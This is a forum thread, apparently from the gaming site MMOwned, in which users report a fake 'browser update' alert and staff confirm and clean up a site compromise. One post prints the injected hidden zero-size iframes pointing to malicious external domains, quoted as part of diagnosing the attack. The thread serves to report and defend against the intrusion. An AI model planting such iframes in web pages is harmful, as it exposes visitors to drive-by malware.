[VIRUS?] Your browser is old

[Danne206]

DO NOT ACT WHEN YOU GET THE NOTIFICATION!!
Close the page/tab and try again within the forum section (mmowned.com/forums/)!

Hello.

I was visiting MMOwned some minutes ago (INDEX, WWW.MMOWNED.COM), when I received a js:alert(). Due to the awful formating, external website address and the suspicious message - I guessed it was something wierd, sherlock huh?

Just to be able to report this, I clicked "OK" to see where it got me. More information below.

Alert text: GamerzExpress - Free games at your fingertips! says: "Warning! Your browser is old. please install the update"
When: Visiting the very first page, mmowned.com. About 00:25 GMT+1
Where it took me when clicking yes: hxxp://www.gamerzexpress.com/elenore/soc.php
(Replaced http even tho the error on that page, I don't want to eventually infect anyone.)

SCREENSHOT: http://www.f.djs-gaming.com/mmowned.png

Hope that I was to help. Sorry if this was intentional

[Zoidberg]

We already know this.

[hayboy1213]

I got it too, i pressed ok, nothing happend, and norton diddnt catch anything.

[Pedregon]

I got this aswell.

[Ground Zero]

Yes, we're aware do not install it, apoc has been contacted.

[Danne206]

We already know this.

Oh, I'm sorry. I must've missed any threads about this, but hey, just woke up so I'll blame it on that :d

[Igzz]

Apoc trying to h4x us!

Nawh seriously though, I clicked cancel.

[soulchief]

I got it using chrome, but i clicked cancel... Chrome automatically updated without me even knowing :P

[Sednogmah]

3 IFRAMEs have been added to the source of http://www.mmowned.com:

Code:

<html><body> 
<iframe src="http://www.gamerzexpress.com" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.gamerzexpress.com/elenore/index.php?" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.darkwealth.com" width="0" height="0" frameborder="0"></iframe>
</html></body>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

It's not injected via JavaScript but either generated directly by the web server or via MITM. Proof:

Code:

$ wget -qO - http://www.mmowned.com |grep gamerz >/dev/null && echo "Not injected via JavaScript."
Not injected via JavaScript.

Is there any chance that this is related to the recent alleged MMOwned hack?

We already know this.

Why is the site still online then?

[dw~]

Could be a 'virus', editing the host file to disallow permission to MMOwned and perhaps redirecting to gamerzexpress or something.

what did i say about the site being haxed yesterday...

[Dombo]

Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)

It's not injected via JavaScript but either generated directly by the web server or via MITM.

I think it's generated by one of the sites.

[soulchief]

Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)



I think it's generated by one of the sites.

Site is also hosted on an offshore server, so cant get them shutdown either. Gamerzexpress could be shutdown though, hostgator is USA and they have warez on that site.

[maclone]

You should be save (for now) when you don't have java or adobe reader installed.
But don't try your luck.

[Sednogmah]

You should be save (for now) when you don't have java or adobe reader installed.
But don't try your luck.

Do you have any details on the problem? Both Adobe Reader & the Adobe Flash player have a long history of security flaws... but not Sun's JRE. The last JRE exploit is many months old.

Generally it's not a bad idea to apply a whitelist approach to active web content, no matter if it's Flash, Shockwave, Java and even JavaScript. For example there's NoScript for Firefox. With that you don't have to uninstall Java, Flash or the Adobe Reader, at least not in order to stay relatively safe on the web.

Windows XP users should beware the still unpatched help center exploit that allows attackers to run arbitrary code by crafting malicious websites: http://seclists.org/fulldisclosure/2010/Jun/205

[Apoc]

Alright folks, I went through the paces, going from worst, to least, security wise.

The iframes should be gone for good. However; if you do see another one pop up, please, PLEASE let me, or another staff member know. (They know how to contact me.)

With the size of this site, and the others, it's a bit hard to find all the possibilities that an attacker can use to gain access to the servers.

There are now newer (and a bit 'heavier') security measures in place, so if things seem a little strange, please send me a PM.

This will likely be users being refused from connecting to the server, etc.

I've also done quite a few things to the servers that I really shouldn't have had to do. But it's worth it in the end.

I do apologize for anybody who has been infected by these *******s. But I appreciate that everyone cares enough to properly report the issue, and do a little research to help everyone else. Lets hope this doesn't happen again any time soon. (We're a very large site, and one of the largest WoW sites on the net, people attacking us is going to happen. So we simply deal with it as it happens.)